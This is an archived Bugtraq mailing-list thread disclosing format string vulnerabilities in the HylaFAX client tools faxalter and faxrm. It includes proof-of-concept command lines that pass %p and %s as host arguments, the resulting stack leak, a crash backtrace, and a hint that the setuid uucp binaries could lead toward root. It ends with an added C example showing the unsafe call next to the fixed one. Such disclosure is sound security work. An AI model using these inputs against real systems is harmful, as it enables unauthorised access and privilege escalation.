Bugtraq mailing list archives

Re: hylafax


From: KF <dotslash () snosoft com>
Date: Mon, 04 Sep 2000 04:54:19 -0400

Same deal on Mandrake 8.0...

hylafax-client-4.1-5mdk.i586.rpm 

[root@linux /root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for i586

[root@linux /root]# ls -al /usr/bin/faxalter
-rwxr-xr-x    1 root     root        13380 Aug  6  2001 /usr/bin/faxalter*

[root@linux /root]# /usr/bin/faxalter -h %p,%p,%p,%p,%p,%p,%p -D 1
0x804a153,0x401b3290,0x1,0x8048364,0xbffff25c,(nil),0x40015b94: Unknown host

[root@linux elguapo]# /usr/bin/faxalter -h %s,%s,%s -D 1
Segmentation fault (core dumped)
[root@linux elguapo]# gdb  /usr/bin/faxalter core

(gdb) bt
#0  0x40209ab7 in vfprintf () from /lib/libc.so.6
#1  0x4020d0f0 in vfprintf () from /lib/libc.so.6
#2  0x40207d7b in vfprintf () from /lib/libc.so.6
#3  0x40066509 in FaxClient::vprintError () from /usr/lib/libfaxutil.so.4.0.1

-KF 


There are some format string vulnerabilities in the latest hylafax package;
try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept".
Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from
port collection). uid uucp is not that exciting but with some luck you'll
find uucp owned binaries running from cron with uid 0.

--
Sent through GMX FreeMail - http://www.gmx.net
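
Added example (not part of the original posts and not HylaFAX source): the bug class behind the output above, where a user-supplied host string reaches the vfprintf family as the format, shown beside the corrected call. The function names and the way the message is assembled are assumptions; the page shows only that the -h value ended up in vfprintf via FaxClient::vprintError.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical error reporter: like the FaxClient::vprintError frame in the
 * backtrace, it hands its format argument to the vfprintf family.
 * Declaring it with __attribute__((format(printf, 3, 4))) lets
 * gcc -Wformat-security flag the unsafe call below at build time. */
static int print_error(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* BEFORE (assumed pattern): the -h value becomes part of the format string,
 * so any conversion in it is interpreted against arguments never passed. */
int unknown_host_unsafe(char *out, size_t n, const char *host)
{
    char fmt[256];
    snprintf(fmt, sizeof fmt, "%s: Unknown host", host);
    return print_error(out, n, fmt);
}

/* AFTER: the format is a constant and the host is passed as data, so
 * conversions inside it are copied out literally. */
int unknown_host_safe(char *out, size_t n, const char *host)
{
    return print_error(out, n, "%s: Unknown host", host);
}

int main(void)
{
    char msg[128];
    unknown_host_safe(msg, sizeof msg, "%p,%p,%s");  /* constructed input */
    puts(msg);
    return 0;
}
```

With a host name that contains no conversions both functions produce the same message, which is why this defect survives ordinary testing.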

